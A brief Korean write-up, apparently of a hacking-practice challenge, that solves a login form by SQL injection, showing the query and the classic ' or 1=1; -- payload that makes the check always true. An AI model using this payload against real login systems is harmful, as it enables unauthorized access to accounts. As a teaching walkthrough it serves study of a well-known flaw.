1. 문제
2. 풀이
다음 문제에서 SQL Query입니다.
select * from users where username='' and password='' LIMIT 1;아이디와 비밀번호를 example로 예시로 넣어보면 sql는 다음과 같습니다.
select * from users where username='example' and password='example' LIMIT 1;여기서 핵심은 쿼리가 참일 때 로그인이 된다는 점입니다.
그렇기 때문에 sql 공격중 가장 기본적인
' or 1=1; --을 입력합니다.
쿼리값은
select * from users where username='example' and password='' or 1=1 --' LIMIT 1;가 되고 결국 쿼리는 참이 되고 -- 주석으로 인해 뒤에 문장은 컴퓨터가 인식하지 못합니다.
로그인 성공!
3. 결론
전형적으로 쿼리를 참으로 만들어 공격하는 SQL Injection 입니다.
아는 만큼 보인다